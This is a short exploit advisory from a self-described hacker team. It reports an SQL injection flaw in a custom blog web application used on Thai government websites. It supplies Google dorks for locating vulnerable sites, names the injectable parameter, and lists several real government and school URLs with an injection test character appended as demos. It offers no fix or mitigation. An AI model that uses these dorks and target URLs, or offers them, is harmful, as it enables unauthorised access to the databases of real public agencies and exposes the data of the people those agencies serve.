facebook facebook twitter rss

Thailand Gov Custom Blog WebApp SQL Injection

Author: Shelesh Rauthan , Published: 03-06-2015
=========================================================
[+] Title :- Thailand Gov Custom Blog WebApp SQL Injection
[+] Date :- 1 - June - 2015
[+] Exploit Author :- Shelesh Rauthan (ShOrTy420 aKa SEB@sTiaN)
[+] Team name :-
___________
\__ ___/___ _____ _____
| |_/ __ \\__ \ / \
| |\ ___/ / __ \| Y Y \
|____| \___ >____ /__|_| /
\/ \/ \/
_____ .__ __
/ _ \ | | _____ _______/ |_ ___________
/ /_\ \| | \__ \ / ___/\ __\/ _ \_ __ \
/ | \ |__/ __ \_\___ \ | | ( <_> ) | \/
\____|__ /____(____ /____ > |__| \____/|__|
\/ \/ \/
__________
\______ \_______ ____ ____ ________ ____
| | _/\_ __ \_/ __ \_/ __ \\___ // __ \
| | \ | | \/\ ___/\ ___/ / /\ ___/
|______ / |__| \___ >\___ >_____ \\___ >
\/ \/ \/ \/ \/
[+] The official Members :- Sh0rTy420, P@rL0u$, !nfIn!Ty, Th3G0v3Rn3R
[+] Greedz to :- @@lu, Lalit, MyLappy:3, Diksha
[+] Facebook :- fb.com/shelesh.rauthan
[+] Gmail.com :- indian.1337.hacker@gmail.com

=========================================================

[+] Dork site:go.th inurl:"id_sub_menu="

site:th inurl:"id_sub_menu="

=========================================================

[+] About :- Thailand government authority running an custom blog web application on major websites which is vulnerable to SQL injection!

SQL Vulnerable component Link : /home/ABC/domains/DOMAIN.go.th/public_html/core_main/module/web/blog/blog.php

=========================================================

[+] DisCription :-

Google search from the above given google Dorks, open any site from the given result having "web/blog&id_sub_menu=" present in url
Note:- Replace "&namemenu=" parameter from the end of url
SQL Vulnerable Link: "DOMAIN.go.th/XXX/index.php?mod=blog&path=web/blog&id_sub_menu=102%27"


[+] Demo :-


http://www.sappha.moe.go.th/sappha/index.php?mod=blog&path=web/blog&id_sub_menu=102%27
http://www.sesao19.go.th/web/spm19/index.php?mod=blog&path=web/blog&id_sub_menu=59%27
http://www.chiangmaiarea6.go.th/cma/index.php?mod=blog&path=web/blog&id_sub_menu=45%27
http://thirdthai.ac.th/index.php?mod=blog&path=web/blog&id_sub_menu=48%27


=========================================================

Severity Level: [+] High

Request Method(s): [+] GET / POST

Vulnerable Parameter(s): [+] id_sub_menu, blog

Affected Area(s): [+] Entire admin, database, Server

===========================================================

Like us on Facebook :